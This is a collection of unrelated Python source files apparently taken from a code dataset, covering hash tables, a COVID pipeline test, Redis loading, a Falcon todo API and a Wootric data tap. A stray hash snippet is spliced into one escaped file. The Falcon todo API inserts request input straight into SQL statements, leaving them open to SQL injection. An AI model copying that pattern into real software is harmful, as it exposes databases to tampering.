exists.\n        # If it does, overwrite the value stored there\n        index = self.fnv1(key)\n        node_with_key = self.__find_node_with_key_in_ll(self.data[index], key)\n        if node_with_key is not None:\n            # A node with this key exists--simply update\n            # its value\n            node_with_key.value.value = value\n            # ^^^ value.value because the node's value is a\n            # HashTableEntry which also has value (with a key)\n            return # we are done\n        \n        # The key was not found in its bucket. 
Now move on to ADDING\n        # an entry--but beforehand, let's see if we need to resize\n        # the hashtable\n        \n        if self.get_load_factor() > self.resizeWhenLoadFactorGreaterThan:\n            # the load is too much--double the size of the HT\n            self.resize(self.capacity * 2)\n        \n        # create the node\n        node = Node(HashTableEntry(key, value))\n        # insert the node at the head of the linked list\n        # that is at the hashed key's index (recomputed, in case we resized)\n        index = self.fnv1(key)\n        self.data[index].insert_at_head(node)\n        # increment the HT item count\n        self.count += 1\n        \n    def __find_node_with_key_in_ll(self, linkedlist, key): \n        cur = linkedlist.head\n        while cur is not None:\n            if cur.value.key == key:\n                return cur\n            cur = cur.next\n        return None\n\n\n    def delete(self, key):\n        \"\"\"\n        Remove the value stored with the given key.\n\n        Print a warning if the key is not found.\n\n        Implement this.\n        \"\"\"\n        \n        # get the index of this key\n        index = self.fnv1(key)\n        # find the ll at this index\n        ll_at_index = self.data[index]\n        # get the head\n        cur = ll_at_index.head\n        \n        # Empty bucket - nothing to delete\n        if cur is None:\n            print(f\"Warning: key '{key}' not found\")\n            return None\n        \n        # Special case - deleting the head\n        if cur.value.key == key:\n            ll_at_index.head = ll_at_index.head.next\n            # decrement the HT item count\n            self.count -= 1\n            return cur\n        \n        # General case - deleting any node that is not the head\n        prev = cur\n        cur = cur.next\n        while cur is not None:\n            if cur.value.key == key: # the node to delete\n                prev.next = cur.next # removes all refs to this node for GC\n                # decrement the HT item count\n                self.count -= 1\n                return cur\n            else:\n                prev = prev.next\n                cur = cur.next\n        \n        print(f\"Warning: key '{key}' not found\")\n        return None\n\n\n    def get(self, key):\n        \"\"\"\n        Retrieve the value stored with the given key.\n\n        Returns None if the key is not found.\n\n        Implement this.\n        \"\"\"\n        # get the index of this key\n        index = self.fnv1(key)\n        # find the ll at this index\n        ll_at_index = self.data[index]\n        # find the node with this key in this ll\n        found_node = self.__find_node_with_key_in_ll(ll_at_index, key)\n        \n        if found_node:\n            return found_node.value.value\n            # ^^^^ value.value because find_node returns a node with\n            # a HashTableEntry as its value, which in turn has\n            # its own value\n        \n        # not found\n        return None\n\n\n    def resize(self, new_capacity):\n        \"\"\"\n        Changes the capacity of the hash table and\n        rehashes all key/value pairs.\n\n        Implement this.\n        \"\"\"\n        # set the new capacity\n        self.capacity = new_capacity\n        # set the placeholder for the resized HT\n        new_data = []\n        # loop thru the current HT and add all its\n        # values to new_data\n        for ll_at_index in self.data:\n            cur = ll_at_index.head\n            while cur is not None:\n                kv = {}\n                kv[\"key\"] = cur.value.key\n                kv[\"value\"] = cur.value.value\n                new_data.append(kv)\n                cur = cur.next\n        \n        # resize data with fresh, independent buckets\n        self.data = [LinkedList() for _ in range(self.capacity)]\n        # put() recounts every entry as it is re-inserted below,\n        # so reset the count to avoid double-counting\n        self.count = 0\n        for kv in new_data:\n            self.put(kv[\"key\"], kv[\"value\"])\n\n\nif __name__ == \"__main__\":\n    ht = HashTable(8)\n    \n    ht.put(\"line_1\", \"'Twas brillig, and the slithy toves\")\n    ht.put(\"line_2\", \"Did gyre and gimble in the wabe:\")\n    ht.put(\"line_3\", \"All mimsy were the borogoves,\")\n    ht.put(\"line_4\", \"And the mome raths outgrabe.\")\n    ht.put(\"line_5\", '\"Beware the Jabberwock, my son!')\n    ht.put(\"line_6\", \"The jaws that bite, the claws that catch!\")\n    ht.put(\"line_7\", \"Beware the Jubjub bird, and shun\")\n    ht.put(\"line_8\", 'The frumious Bandersnatch!\"')\n    ht.put(\"line_9\", \"He took his vorpal sword in hand;\")\n    ht.put(\"line_10\", \"Long time the manxome foe he sought--\")\n    ht.put(\"line_11\", \"So rested he by the Tumtum tree\")\n    ht.put(\"line_12\", 
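# --- Editor's addition (illustrative sketch, not part of the original file). ---
# Standalone versions of the two string hashes the HashTable above asks for,
# so their bucket spread can be eyeballed without the class plumbing:
def fnv1a_32(key):
    hval = 0x811c9dc5
    for ch in key:
        hval = (hval ^ ord(ch)) * 0x01000193 % 2**32   # XOR, then multiply
    return hval

def djb2_32(key):
    hval = 5381
    for ch in key:
        hval = (hval * 33 + ord(ch)) & 0xFFFFFFFF
    return hval

buckets = [0] * 8
for word in ("apple", "pear", "plum", "fig", "cherry", "grape", "kiwi", "lime"):
    buckets[djb2_32(word) % 8] += 1
print(buckets)   # rough view of how evenly 8 keys spread over 8 slots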
\"And stood awhile in thought.\")\n\n print(\"\")\n\n # Test storing beyond capacity\n for i in range(1, 13):\n print(ht.get(f\"line_{i}\"))\n\n # Test resizing\n old_capacity = ht.get_num_slots()\n ht.resize(ht.capacity * 2)\n new_capacity = ht.get_num_slots()\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # Test if data intact after resizing\n for i in range(1, 13):\n print(ht.get(f\"line_{i}\"))\n\n print(\"\")\n\n","sub_path":"hashtable/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"622371618","text":"#!/usr/bin/env python3\n# See: https://github.com/VirusTrack/COVIDvu/blob/master/LICENSE\n# vim: set fileencoding=utf-8:\n\nimport os\nimport pandas as pd\nfrom covidvu.cryostation import Cryostation\nfrom covidvu.config import MASTER_DATABASE\nfrom covidvu.pipeline.vugrowth import _computeGrowthFor\nfrom covidvu.pipeline.vugrowth import _getGrowthGaugeData\nfrom covidvu.pipeline.vugrowth import WINDOW_SIZE\nfrom covidvu.pipeline.vugrowth import _appendGrowthToCountries\nfrom covidvu.pipeline.vugrowth import computeGrowth\n\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.series import Series\n\nREAL_DATABASE_PATH = './database/virustrack.db'\nTEST_TODAY_DATE = pd.to_datetime('2020-04-15').date()\nTEMP_DATABASE_NAME = 'temp-virustrack.db'\n\ndef makeTestDatabase():\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n with Cryostation(MASTER_DATABASE) as cryostation:\n unitedStates = cryostation['US']\n california = {'confirmed': unitedStates['provinces']['California']['confirmed']}\n newYork = {'confirmed': unitedStates['provinces']['New York']['confirmed']}\n newJersey = {'confirmed': unitedStates['provinces']['New Jersey']['confirmed']}\n\n item = {'confirmed': unitedStates['confirmed'],\n 'provinces': {'California': california,\n 'New York': newYork,\n 'New Jersey': newJersey,\n },\n 'key': 'US'}\n\n cryostationTest['US'] = item\n\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n with Cryostation(MASTER_DATABASE) as cryostation:\n italy = {'confirmed': cryostation['Italy']['confirmed'],\n 'key': 'Italy'}\n uk = {'confirmed': cryostation['United Kingdom']['confirmed'],\n 'key': 'United Kingdom'}\n\n cryostationTest['Italy'] = italy\n cryostationTest['United Kingdom'] = uk\n\n\ndef test__computeGrowthFor():\n makeTestDatabase()\n with Cryostation(TEMP_DATABASE_NAME) as cryostation:\n print('Loading time series for countries...')\n regions = cryostation.timeSeriesFor(regionType = 'country',\n casesType = 'confirmed',\n )\n growth = _computeGrowthFor(regions, WINDOW_SIZE)\n assert isinstance(growth, DataFrame)\n\n smoothCases = (regions.iloc[-WINDOW_SIZE:, 0].mean(),\n regions.iloc[-WINDOW_SIZE-1:-1, 0].mean(),\n regions.iloc[-WINDOW_SIZE-2:-2, 0].mean(),\n )\n growthFactorExpectedFinal = (smoothCases[0] - smoothCases[1])/(smoothCases[1] - smoothCases[2])\n assert abs(growth.iloc[-1,0] - growthFactorExpectedFinal) < 1e-4\n\n return growth\n\n\ndef test__getGrowthGaugeData():\n growth = test__computeGrowthFor()\n growthGaugeData = _getGrowthGaugeData(growth, TEST_TODAY_DATE)\n assert 'yesterday' in growthGaugeData\n assert 'lastWeek' in growthGaugeData\n assert 'lastTwoWeek' in growthGaugeData\n assert isinstance(growthGaugeData['yesterday'], Series)\n assert isinstance(growthGaugeData['lastWeek'], Series)\n assert isinstance(growthGaugeData['lastTwoWeek'], Series)\n assert 
(growth.columns.isin(growthGaugeData['yesterday'].index)).all()\n assert (growth.columns.isin(growthGaugeData['lastWeek'].index)).all()\n assert (growth.columns.isin(growthGaugeData['lastTwoWeek'].index)).all()\n return growthGaugeData\n\n\ndef test__appendGrowthToCountries():\n growthGaugeData = test__getGrowthGaugeData()\n _appendGrowthToCountries(growthGaugeData, TEMP_DATABASE_NAME)\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n assert isinstance(cryostationTest['US']['growth'], dict)\n assert isinstance(cryostationTest['Italy']['growth'], dict)\n assert isinstance(cryostationTest['United Kingdom']['growth'], dict)\n os.remove(TEMP_DATABASE_NAME)\n\n\ndef test_computeGrowth():\n makeTestDatabase()\n computeGrowth(regionType='country',\n casesType='confirmed',\n todayDate=TEST_TODAY_DATE,\n databasePath=TEMP_DATABASE_NAME)\n with Cryostation(TEMP_DATABASE_NAME) as cryostationTest:\n assert isinstance(cryostationTest['US']['growth'], dict)\n assert isinstance(cryostationTest['Italy']['growth'], dict)\n assert isinstance(cryostationTest['United Kingdom']['growth'], dict)\n os.remove(TEMP_DATABASE_NAME)\n","sub_path":"work/test/covidvu/pipeline/test_vugrowth.py","file_name":"test_vugrowth.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"344687446","text":"from .models import Translation, GroupTranslation, Label\nimport os\nimport redis\nimport json\n\ndef loadTranslations():\n r = redis.Redis(host=os.environ['TRANSLATIONS_REDIS_HOST'],\n\tport=os.environ['TRANSLATIONS_REDIS_PORT'],\n password=os.environ['TRANSLATIONS_REDIS_PASS'],\n db=os.environ['TRANSLATIONS_REDIS_DB'])\n\t\n r.flushdb()\n\n translations = Translation.objects.all().order_by('label')\n for item in translations:\n k = 't_%s_%s' % (item.label.name, item.language.initials)\n r.set(k,item.value)\n\n groups = GroupTranslation.objects.all()\n for group in groups:\n lbls = Label.objects.filter(grouptranslation=group)\n t = Translation.objects.filter(label_id__in=lbls).order_by('language')\n resp = {}\n if t:\n currentLanguage = t.first().language.initials\n for item in t:\n if item.language.initials != currentLanguage:\n k = 'g_%s_%s' % (group.name, currentLanguage)\n r.set(k,json.dumps(resp))\n resp.clear()\n currentLanguage = item.language.initials\n\n resp.update({item.label.name:item.value})\n if len(resp) > 0:\n k = 'g_%s_%s' % (group.name, currentLanguage)\n r.set(k,json.dumps(resp))\n ","sub_path":"web/main/load_redis.py","file_name":"load_redis.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391719498","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/xdis/opcodes/opcode_22.py\n# Compiled at: 2020-04-18 17:55:45\n\"\"\"\nCPython 2.2 bytecode opcodes\n\nThis is similar to the opcode portion in Python 2.2's dis.py library.\n\"\"\"\nimport xdis.opcodes.opcode_2x as opcode_2x\nfrom xdis.opcodes.base import def_op, init_opdata, finalize_opcodes, format_extended_arg, update_pj2\nversion = 2.2\nl = locals()\ninit_opdata(l, opcode_2x, version)\ndef_op(l, 'FOR_LOOP', 114)\ndef_op(l, 'SET_LINENO', 127, 0, 0)\nupdate_pj2(globals(), l)\nopcode_arg_fmt = {'EXTENDED_ARG': 
format_extended_arg}\nfinalize_opcodes(l)","sub_path":"pycfiles/xdis-4.4.0-py2.4/opcode_22.py","file_name":"opcode_22.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"69342334","text":"import os\nimport os.path\nimport json\nimport logging\nimport tempfile\n\nfrom introspection_handler import IntrospectionHandler\nfrom util import copy_origin\n\nlog = logging.getLogger(__name__)\n\nclass RestCollectionHandler(IntrospectionHandler):\n    \"\"\"\n    Reference: https://en.wikipedia.org/wiki/REST\n\n    Collections are represented as directories. The supported operations are\n\n    - GET: list the URIs of the collection members\n    - PUT: not supported\n    - POST: create a new entry and assign a new URI\n    - DELETE: clear the collection\n    \"\"\"\n    id_key = \"id\"\n\n    def handle_collection(self, method, *args):\n        return self.call_handler(\"handle_collection_\" + method, method, *args)\n\n    def handle_collection_GET(self, path, rfile, headers, *args):\n        items = os.listdir(path)\n        items = [{self.id_key: key} for key in items]\n\n        yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n        yield json.dumps(items, indent=2)\n\n    # named POST so the name-based dispatcher in handle_collection routes\n    # POST requests here, matching the docstring (POST creates a new entry\n    # with a server-assigned name; PUT is not supported)\n    def handle_collection_POST(self, path, rfile, headers, *args):\n        def createFile(path):\n            return tempfile.NamedTemporaryFile(mode=\"w\", dir=path, delete=False)\n\n        length = headers['content-length']\n        data = rfile.read(int(length))\n\n        with createFile(path) as fobj:\n            fobj.write(data)\n\n        fname = fobj.name\n        basename = os.path.basename(fname)\n\n        yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n        yield json.dumps({ \"key\": basename }, indent=2)\n\n    def handle_collection_DELETE(self, path, rfile, headers, *args):\n        for basename in os.listdir(path):\n            fname = os.path.join(path, basename)\n            log.info(\"delete %s\", fname)\n\n            os.remove(fname)\n\n        yield copy_origin({\"Content-Type\": \"application/json\"}, headers)\n        yield json.dumps({ \"result\": \"success\"}, indent=2)\n\n","sub_path":"simple_rest_server/handler/rest_collection_handler.py","file_name":"rest_collection_handler.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"524586327","text":"\"\"\"\nThis script does all the heavy-lifting of setting up the\n initial databases...\ntopn ~ limit/5 seems a good number to ensure\n the combination of having enough traits\n yet avoiding matches that are completely irrelevant\n\"\"\"\n\nimport nltk\nimport zipfile\nfrom nltk.corpus import brown\nfrom gensim.models import KeyedVectors\n\nfrom tqdm import tqdm\n\nfrom populate_traits_lib import *\nfrom trait_dao import TraitDao\n\nTraitDao.create_tables()\nTraitDao.empty_tables()\n\n# using the regular download can result in certificate problems\n# which are hard to resolve without root access to computer\n# but if you have root access to computers, this is the simplest way to\n# download the brown corpora:\n# nltk.download('brown')\n\nprint(\"Extracting brown corpora to directory\")\nzip_ref = zipfile.ZipFile('brown.zip', 'r')\n# if nltk.data.path[0] fails, just try [1],[2],... and so on\n# on our system we had about 10 alternative paths, eg. 
[0]~[9]\n# you need write permissions to the path you choose\nzip_ref.extractall(nltk.data.path[0])\nzip_ref.close()\n\nprint(\"Loading GoogleNews-vectors into word2vec (~30 seconds)\")\nmodel = KeyedVectors.load_word2vec_format(\n 'GoogleNews-vectors-negative300.bin.gz',\n binary=True,\n limit=500000\n)\n\nprint(\"Extracting words from word2vec model\")\nfriendliness = model.most_similar(\n positive=['friendly', 'affectionate', 'loving', 'kind'],\n negative=['hostile', 'hurtful', 'unfriendly', 'mean'],\n topn=100000\n)\nunfriendliness = model.most_similar(\n positive=['hostile', 'hurtful', 'unfriendly', 'mean'],\n negative=['friendly', 'affectionate', 'loving', 'kind'],\n topn=100000\n)\ndominance = model.most_similar(\n positive=['dominant', 'assertive', 'capable', 'important'],\n negative=['submissive', 'apologetic', 'meek', 'passive'],\n topn=100000\n)\nundominance = model.most_similar(\n positive=['submissive', 'apologetic', 'meek', 'passive'],\n negative=['dominant', 'assertive', 'capable', 'important'],\n topn=100000\n)\n\n# set of over 8000 adjectives\nadjectives = {word for word, pos in brown.tagged_words()\n if pos.startswith('JJ')}\n\nprint(\"Filtering for adjectives from extracted words\")\nfriendliness = filter_adjectives(friendliness, adjectives)\nunfriendliness = filter_adjectives(unfriendliness, adjectives)\ndominance = filter_adjectives(dominance, adjectives)\nundominance = filter_adjectives(undominance, adjectives)\n\nprint(\"Scaling the list to fit the range (0,10) or (-10,0)\")\nfriendliness = scale_my_list(friendliness, True)\nunfriendliness = scale_my_list(unfriendliness, False)\ndominance = scale_my_list(dominance, True)\nundominance = scale_my_list(undominance, False)\n\nprint(\"Adding traits to database:\")\nprint(\"- 1/4\")\nfor trait in tqdm(friendliness):\n TraitDao.add_friendliness_trait(trait[0], trait[1])\nprint(\"- 2/4\")\nfor trait in tqdm(unfriendliness):\n TraitDao.add_friendliness_trait(trait[0], trait[1])\nprint(\"- 3/4\")\nfor trait in tqdm(dominance):\n TraitDao.add_dominance_trait(trait[0], trait[1])\nprint(\"- 4/4\")\nfor trait in tqdm(undominance):\n TraitDao.add_dominance_trait(trait[0], trait[1])\n\nprint(\"traits.db is ready!\")\n","sub_path":"interpersonal/build_traits_database/populate_traits.py","file_name":"populate_traits.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"84747901","text":"import falcon\nimport json\nimport logging\nimport time\nimport datetime\nimport falcon_cors\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\n\n\ncors = falcon_cors.CORS(\n allow_origins_list=['http://localhost:4200'], allow_all_methods=True, allow_all_headers=True)\n\n\nclass Parent():\n def __init__(self, connection):\n self.connection = connection\n pass\n\n def get_body(self, req):\n return req.stream.read(req.content_length or 0).decode('utf-8')\n\n def get_json_body(self, req):\n try:\n return json.loads(self.get_body(req))\n except json.decoder.JSONDecodeError:\n raise falcon.HTTPError(falcon.HTTP_400, 'Malformed JSON')\n\n def date_handler(self, obj):\n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n elif obj is None:\n return obj\n else:\n raise TypeError\n\n\nclass Todos(Parent):\n # def __init__(self): # constructor\n # pass\n\n # on_get is because of falcon. 
self is because of python functions\n\n    def on_get(self, req, resp):\n\n        cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n        cursor.execute(\"SELECT * FROM todos ORDER BY created DESC\")\n        todos = cursor.fetchall()\n\n        self.connection.commit()\n        cursor.close()\n        logging.warning(todos)\n\n        resp.status = falcon.HTTP_200\n\n        resp.body = json.dumps(todos, default=self.date_handler)\n\n    # on_post is because of falcon. self is because of python functions\n    def on_post(self, req, resp):\n        body = self.get_json_body(req)\n\n        name = body.get('name', None)\n        if name is None:\n            raise falcon.HTTPError(\n                falcon.HTTP_400, 'Name field cannot be empty')\n\n        newTodo = {\n            \"name\": name\n        }\n\n        cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n        cursor.execute(\"\"\"\n        INSERT INTO todos (name) VALUES ('{name}') RETURNING id,name, created, completed, complete\n        \"\"\".format(name=newTodo.get('name')))\n\n        # sql_string = \"INSERT INTO todos (name) VALUES (%s) RETURNING id;\"\n        # cursor.execute(sql_string, (newTodo.get('name')))\n\n        output = cursor.fetchone()\n        logging.warning(output)\n        self.connection.commit()\n        cursor.close()\n\n        resp.status = falcon.HTTP_201\n\n        resp.body = json.dumps(output, default=self.date_handler)\n\n\nclass Todo(Parent):\n    # def __init__(self):  # constructor\n    #     pass\n\n    # on_get is because of falcon. self is because of python functions\n    def on_get(self, req, resp, id):\n        try:\n            cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n            cursor.execute(\"\"\"\n            SELECT * FROM todos WHERE id={id}\n            \"\"\".format(id=id))\n\n            todo = cursor.fetchone()\n\n            self.connection.commit()\n            cursor.close()\n            logging.warning(todo)\n\n            resp.status = falcon.HTTP_200\n        except KeyError:\n            resp.status = falcon.HTTP_404\n            todo = {}\n\n        resp.body = json.dumps(todo, default=self.date_handler)\n\n    # on_patch is because of falcon. 
self is because of python functions\n    def on_patch(self, req, resp, id):\n        body = self.get_json_body(req)\n\n        try:\n            cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n            cursor.execute(\"\"\"\n            SELECT * FROM todos WHERE id={id}\n            \"\"\".format(id=id))\n            todo = cursor.fetchone()\n\n        except KeyError:\n            resp.status = falcon.HTTP_404\n            raise falcon.HTTPError(\n                falcon.HTTP_400, 'This Todo Id does not exist')\n\n        errors = []\n        todoId = body.get('id', None)\n        if todoId is not None:\n            errors.append('Id cannot be sent')\n\n        name = body.get('name', todo['name'])\n        if name is None and todo['name'] is None:\n            errors.append('Name field cannot be empty')\n        elif type(name) is not str:\n            errors.append('Name must be a string')\n\n        complete = body.get('complete', None)\n        if complete is None:\n            errors.append('Complete field cannot be empty')\n\n        if type(complete) is not bool:\n            errors.append('Complete must be a boolean')\n\n        created = body.get('created', None)\n\n        if created is not None:\n            try:\n                datetime.datetime.fromtimestamp(created)\n            except TypeError:  # only catch TypeError in this try/except\n                errors.append('Created time is not valid')\n\n            if created >= int(time.time()):\n                newCreated = created\n            else:\n                errors.append('Created time cannot be before now')\n\n        completed = body.get('completed', None)\n        if completed is not None:\n            errors.append('Completed time cannot be sent')\n\n        if todo['completed'] is None and complete is True:\n            completed = datetime.datetime.now()\n\n        if todo['completed'] is None and complete is False:\n            completed = None\n\n        if todo['complete'] is True and complete is False:\n            completed = None\n\n        updatedTodo = {\n            \"id\": todo['id'],\n            \"complete\": complete,\n            \"name\": name,\n            \"completed\": completed,\n        }\n\n        if len(errors):\n            raise falcon.HTTPError(\n                falcon.HTTP_400, 'Errors', errors)\n\n        cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n        if complete is True:\n            cursor.execute(\"\"\"\n            UPDATE todos SET name=('{name}'),completed=('{completed}'),complete=('{complete}') WHERE id = ('{id}') RETURNING id, name, created, completed, complete\n            \"\"\".format(name=updatedTodo.get('name'), completed=updatedTodo.get('completed'), complete=updatedTodo.get('complete'), id=updatedTodo.get('id')))\n        else:\n            cursor.execute(\"\"\"\n            UPDATE todos SET name=('{name}'),completed=NULL,complete=('{complete}') WHERE id = ('{id}') RETURNING id, name, created, completed, complete\n            \"\"\".format(name=updatedTodo.get('name'), complete=updatedTodo.get('complete'), id=updatedTodo.get('id')))\n\n        output = cursor.fetchone()\n\n        logging.warning(output)\n        self.connection.commit()\n        cursor.close()\n\n        resp.status = falcon.HTTP_201\n        resp.body = json.dumps(output, default=self.date_handler)\n\n    def on_delete(self, req, resp, id):\n        try:\n            cursor = self.connection.cursor(cursor_factory=RealDictCursor)\n\n            cursor.execute(\"\"\"\n            DELETE FROM todos WHERE id={id}\n            \"\"\".format(id=id))\n\n            self.connection.commit()\n            cursor.close()\n\n            resp.status = falcon.HTTP_200\n        except KeyError:\n            resp.status = falcon.HTTP_404\n\n        resp.body = json.dumps({\"message\": \"deleted\"})\n\n\n# connection to db\ndef connect_to_database():\n    def _do_connect():\n        logging.warning('trying to connect')\n        connection = psycopg2.connect(\n            dbname='todos',\n            user='postgres',\n            password='',\n            host='database'\n        )\n        return connection\n\n    tries = 0\n    connection = False\n\n    while not connection:\n        try:\n            connection = _do_connect()\n        except psycopg2.OperationalError as e:\n            logging.warning(\n                'Database not 
available, waiting try: {}'.format(tries))\n\n if tries > 5:\n raise e\n\n time.sleep(2)\n finally:\n tries += 1\n\n logging.warning('database available')\n return connection\n\n\nconnection = connect_to_database()\n\napp = falcon.API(middleware=[cors.middleware])\n\ntodos = Todos(connection)\ntodo = Todo(connection)\n\napp.add_route('/todos', todos)\napp.add_route('/todos/{id}', todo)\n","sub_path":"src/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26572775","text":"import os\nimport argparse\nimport logging\nimport requests\nimport stitchstream\nimport sys\nimport json\nimport datetime\n\nsession = requests.Session()\nlogger = logging.getLogger()\nbookmark = {}\n\ndef get_env_or_throw(key):\n value = os.environ.get(key)\n\n if value == None:\n raise Exception('Missing ' + key + ' environment variable!')\n\n return value\n\ndef configure_logging(level=logging.DEBUG):\n global logger\n logger.setLevel(level)\n ch = logging.StreamHandler()\n ch.setLevel(level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\ndef authed_get(url):\n return session.request(method='get', url=url)\n\ndef authed_get_all_pages(baseUrl, bookmarkName):\n global bookmark\n while True:\n url = baseUrl\n if bookmark.get(bookmarkName, None):\n url = baseUrl + '&created[gt]=' + bookmark[bookmarkName]\n r = authed_get(url)\n rJson = r.json();\n yield r\n if len(rJson) <= 1:\n break\n\ndef wootricdate_to_datetime(wootricDateString):\n return datetime.datetime.strptime(wootricDateString, '%Y-%m-%d %H:%M:%S %z')\n\n\nresponse_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'score': {\n 'type': 'integer'\n },\n 'text': {\n 'type': ['string','null']\n },\n 'ip_address': {\n 'type': 'string'\n },\n 'origin_url': {\n 'type': 'string'\n },\n 'end_user_id': {\n 'type': 'integer'\n },\n 'survey_id': {\n 'type': 'integer'\n },\n 'completed': {\n 'type': 'boolean'\n },\n 'excluded_from_calculations': {\n 'type': 'boolean'\n },\n 'tags': {\n 'type': 'array',\n 'items': {\n \"type\": \"string\"\n }\n },\n },\n 'required': ['id']\n }\n\ndef get_all_new_responses():\n global bookmark\n \n last_response_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/responses?per_page=50&sort_order=asc'\n for apiResponse in authed_get_all_pages(requestUrl, 'responses'):\n responses = apiResponse.json()\n if len(responses) > 0:\n last_created_at_datetime = wootricdate_to_datetime(responses[-1]['created_at'])\n last_response_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(responses):\n responses[index]['created_at'] = wootricdate_to_datetime(responses[index]['created_at']).isoformat()\n responses[index]['updated_at'] = wootricdate_to_datetime(responses[index]['updated_at']).isoformat()\n\n stitchstream.write_records('responses', responses)\n\n #there is a limitation of wootric's API that only allows you to get 50 records at a time and has\n #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n if bookmark.get('responses', None) == str(last_response_unixtime) and 
len(responses) > 1:\n logger.error('Breaking retrieval loop for responses at unixtime ' + str(last_response_unixtime) + ', will cause missing data')\n last_response_unixtime = last_response_unixtime + 1\n\n if last_response_unixtime: #can be none if no new responses\n bookmark['responses'] = str(last_response_unixtime)\n\n\ndecline_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'end_user_id': {\n 'type': 'integer'\n },\n 'survey_id': {\n 'type': 'integer'\n }\n },\n 'required': ['id']\n }\n\ndef get_all_new_declines():\n global bookmark\n \n last_decline_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/declines?per_page=50&sort_order=asc'\n for response in authed_get_all_pages(requestUrl, 'declines'):\n declines = response.json()\n if len(declines) > 0:\n last_created_at_datetime = wootricdate_to_datetime(declines[-1]['created_at'])\n last_decline_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(declines):\n declines[index]['created_at'] = wootricdate_to_datetime(declines[index]['created_at']).isoformat()\n declines[index]['updated_at'] = wootricdate_to_datetime(declines[index]['updated_at']).isoformat()\n\n stitchstream.write_records('declines', declines)\n \n #there is a limitation of wootric's API that only allows you to get 50 records at a time and has\n #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n if bookmark.get('declines', None) == str(last_decline_unixtime) and len(declines) > 1:\n logger.error('Breaking retrieval loop for declines at unixtime ' + str(last_decline_unixtime) + ', will cause missing data')\n last_decline_unixtime = last_decline_unixtime + 1\n\n if last_decline_unixtime: #can be None if no new declines\n bookmark['declines'] = str(last_decline_unixtime)\n\nenduser_schema = {'type': 'object',\n 'properties': {\n 'id': {\n 'type': 'integer',\n 'key': True\n },\n 'created_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'updated_at': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'email': {\n 'type': 'string'\n },\n 'last_surveyed': {\n \"anyOf\": [\n {\n \"type\": \"null\",\n }, \n {\n \"type\": \"string\",\n 'format': 'date-time'\n }\n ]\n },\n 'external_created_at': {\n 'type': ['integer','null']\n },\n 'page_views_count': {\n 'type': 'integer'\n }\n },\n 'required': ['id']\n }\n\ndef get_all_new_endusers():\n global bookmark\n \n last_enduser_unixtime = None\n requestUrl = 'https://api.wootric.com/v1/end_users?per_page=50&sort_order=asc'\n for response in authed_get_all_pages(requestUrl, 'endusers'):\n endusers = response.json()\n if len(endusers) > 0:\n last_created_at_datetime = wootricdate_to_datetime(endusers[-1]['created_at'])\n last_enduser_unixtime = int(last_created_at_datetime.timestamp())\n\n for index, item in enumerate(endusers):\n endusers[index]['created_at'] = wootricdate_to_datetime(endusers[index]['created_at']).isoformat()\n endusers[index]['updated_at'] = wootricdate_to_datetime(endusers[index]['updated_at']).isoformat()\n if endusers[index]['last_surveyed']:\n endusers[index]['last_surveyed'] = wootricdate_to_datetime(endusers[index]['last_surveyed']).isoformat()\n\n stitchstream.write_records('endusers', endusers)\n\n #there is a limitation of wootric's API 
